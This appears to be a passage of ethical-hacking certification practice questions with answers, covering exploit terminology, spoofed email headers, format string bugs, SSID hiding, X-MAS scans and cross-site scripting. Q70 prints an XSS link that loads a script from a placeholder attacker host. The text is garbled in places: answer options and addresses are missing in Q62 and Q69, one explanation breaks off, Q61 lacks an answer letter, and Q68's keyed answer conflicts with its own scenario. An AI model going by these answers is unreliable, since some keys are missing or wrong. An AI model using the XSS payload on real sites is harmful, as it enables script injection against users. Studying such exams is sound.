Q61. In the following example, which of these is the "exploit"? 

Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites. 

Select the best answer. 

A. Microsoft Corporation is the exploit. 

B. The security "hole" in the product is the exploit. 

C. Windows 2003 Server 

D. The exploit is the hacker that would use this vulnerability. 

E. The documented method of how to use the vulnerability to gain unprivileged access. 



Microsoft is not the exploit, but if Microsoft documents how the vulnerability can be used to gain unprivileged access, they are creating the exploit. If they just say that there is a hole in the product, then it is only a vulnerability. The security "hole" in the product is called the "vulnerability". It is documented in a way that shows how to use the vulnerability to gain unprivileged access, and it then becomes an "exploit". In the example given, Windows 2003 Server is the TOE (Target of Evaluation). A TOE is an IT System, product or component that requires security evaluation or is being identified. The hacker that would use this vulnerability is exploiting it, but the hacker is not the exploit. The documented method of how to use the vulnerability to gain unprivileged access is the correct answer. 

Q62. The follows is an email header. What address is that of the true originator of the message? 

Return-Path: <bgates@microsoft.com> 

Received: from smtp.com (fw.emumail.com []. 

by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807 

for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500 

Received: (qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 

Received: from ([]. 

by smtp.com with SMTP 

Received: from unknown (HELO CHRISLAPTOP. ( 

by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 

From: "Bill Gates" <bgates@microsoft.com> 

To: "mikeg" <mikeg@thesolutionfirm.com> 

Subject: We need your help! 

Date: Fri, 8 Aug 2003 19:12:28 -0400 

Message-ID: <> 

MIME-Version: 1.0 

Content-Type: multipart/mixed; 


X-Priority: 3 (Normal. 

X-MSMail-Priority: Normal 

X-Mailer: Microsoft Outlook, Build 10.0.2627 

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 

Importance: Normal 





E. 8.10.2/8.10.2 

Answer: C

Explanation: Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address is the true source of the 

Q63. Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf(?s? str). What attack will his program expose the web application to? 

A. Cross Site Scripting 

B. SQL injection Attack 

C. Format String Attack 

D. Unicode Traversal Attack 

Answer: C

Explanation: Format string attacks are a new class of software vulnerability discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * . 

Q64. Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it can’t mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? 

A. Bob can explain that using a weak key management technique is a form of programming error 

B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error 

C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique 

D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error 

Answer: C

Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security. 

Q65. What are the six types of social engineering?(Choose six). 

A. Spoofing 

B. Reciprocation 

C. Social Validation 

D. Commitment 

E. Friendship 

F. Scarcity 

G. Authority 

H. Accountability 

Answer: BCDEFG

Explanation: All social engineering is performed by taking advantage of human nature. For in-depth information on the subject review, read Robert Cialdini's book, Influence: Science and Practice. 

Q66. ou are footprinting Acme.com to gather competitive intelligence. You visit the acme.com websire for contact information and telephone number numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but now it is not there. How would it be possible for you to retrieve information from the website that is outdated? 

A. Visit google search engine and view the cached copy. 

B. Visit Archive.org site to retrieve the Internet archive of the acme website. 

C. Crawl the entire website and store them into your computer. 

D. Visit the company’s partners and customers website for this information. 

Answer: B

Explanation: The Internet Archive (IA) is a non-profit organization dedicated to maintaining an archive of Web and multimedia resources. Located at the Presidio in San Francisco, California, this archive includes "snapshots of the World Wide Web" (archived copies of pages, taken at various points in time), software, movies, books, and audio recordings (including recordings of live concerts from bands that allow it). This site is found at www.archive.org. 

Q67. Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT department of his company installed a wireless network throughout the building. The problem is, is that they are only going to make it available to upper management and the IT department. 

Most employees don't have a problem with this since they have no need for wireless networking, but Jeffery would really like to use wireless since he has a personal laptop that he works from as much as he can. Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless networks available. After about an hour of trying to figure it out, Jeffery cannot get on the company's wireless network. Discouraged, Jeffery leaves the office and goes home. 

The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT department might have turned off SSID broadcasting, and that is why he could not see any wireless networks. How would Jeffrey access the wireless network? 

A. Run WEPCrack tool and brute force the SSID hashes 

B. Jam the wireless signal by launching denial of service attack 

C. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext 

D. Attempt to connect using wireless device default SSIDs 

Answer: C

Q68. In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. 

Why do you think this is possible? 

A. Bob forgot to turn off DHCP. 

B. All access points are shipped with a default SSID. 

C. The SSID is still sent inside both client and AP packets. 

D. Bob’s solution only works in ad-hoc mode. 

Answer: B

Explanation: All access points are shipped with a default SSID unique to that manufacturer, for example 3com uses the default ssid comcomcom. 

Q69. What is the proper response for a X-MAS scan if the port is closed? 






F. No response 


Explanation: Closed ports respond to a X-MAS scan with a RST. 

Q70. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E">See foobar</a> 

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A